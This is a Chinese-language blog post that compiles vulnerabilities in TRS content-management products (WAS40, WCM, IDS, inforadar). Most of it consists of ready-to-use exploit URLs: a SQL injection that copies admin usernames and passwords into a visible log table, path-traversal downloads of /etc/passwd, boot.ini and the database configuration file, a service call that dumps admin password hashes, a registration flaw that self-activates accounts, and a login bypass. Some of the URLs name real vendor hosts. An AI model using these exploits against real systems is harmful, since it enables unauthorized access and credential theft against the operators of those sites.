TRS 漏洞整理

没穿底裤 2019年12月31日21:28:36评论2,674 views字数 2224阅读7分24秒阅读模式
摘要

一、trs was40产品存在多个安全漏洞:1.未授权访问
直接访问was40/tree可以看到一些后台功能

一、trs was40产品存在多个安全漏洞:

1.未授权访问
直接访问was40/tree可以看到一些后台功能

2.信息泄露
访问was40/passwd/passwd.htm
输入一个不存在的用户名会暴露出服务器内网IP地址 同时存在暴力破解用户密码的可能性。

3.未授权发布信息+xss
编辑信息的时候未对提交的数据进行过滤,同时存在未对用户是否登录进行验证

4. 部分用户系统存在system/manager

二、TRS某些版本WCM5.2~WCM6.5?存在SQL注入:

首先是这个页面,好像是越权了http://agent.trs.cn/portal/db/dbupdatelog_list.jsp
正常应该要登陆才能看吧?直接注入
[php]http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG[/php]

注:存在注入参数为:OrderType 和 OrderField
即把查询记录显示在结果里,要是没有记录,可以自己加一条
[php]http://agent.trs.cn/portal/db/dbupdatelog_addedit.jsp[/php]

另,源码在这里存在:
[php]http://iommp.googlecode.com/svn-history/r68/trunk/portal/WebRoot/db/dbupdatelog_list.jsp[/php]

三、trs ids 系统存在任意文件读取和信息泄露漏洞:
具体文件路径在admin/debug/目录下,读取文件为fv.jsp,信息泄露为env.jsp等

四、trs某系统任意文件下载漏洞:
exp
[php]inforadar/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd[/php]
exp2
[php]http://inforadar.trs.com.cn/jsp/util/file_download.jsp?filePath=c:%5Cboot.ini%00.xml[/php]

五、TRS WCM 6.x系列用户密码泄漏:
TRS WCM 6.0以上版本某个功能页面调用service限制不严格,可以获取后台管理用户的用户名和密码序列。

访问链接:[php]HTTP://siteIP+port/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers[/php]

WCM的密码加密方式是:常规32位 MD5 取前15位;

如果只访问wcm/infoview.do,尽管是个错误页面,比如:

首先访问[php]http://10.10.10.10:8080/wcm/infoview.do[/php]

然后你再访问:[php]http://10.10.10.10:8080/wcm[/php]

(如果没有出现,那就多试几个,这个system可以忽略trs ids或ukey的。)

另外infoview.do本身就可以越权调用很多服务(serviceid)的(站点、文章、授权等)……

六、TRS内容管理平台用户注册逻辑漏洞:
网址加上:[php]wcm/console/auth/reg_newuser.jsp[/php]
[php]http://localhost:9999/wcm/console/auth/reg_newuser.jsp[/php]

即将随意表单改成 STATUS 值为 30,或增加STATUS字段表单。
然后提交注册
虽然说是“请等待开通!”,但实际上已经开通了,因为 STATUS 字段让我们改成正常了。
直接登陆

虽然没什么权限,但后台存在大量注入等漏洞

可以通过注入直接操作数据库了。
[php]http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx[/php]
直接下载数据库配置文件

七、TRS的WCM6漏洞权限绕过以及绕过密码的登陆方式:

首先访问wcm目录,会自动跳转到登录页面

在网址后加上查看管理员密码的链接:[php]wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin[/php]

*之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题

这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入wcm/app/login.jsp,这样就绕过权限登录了:

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日21:28:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   TRS 漏洞整理http://cn-sec.com/archives/75405.html

发表评论

匿名网友 填写信息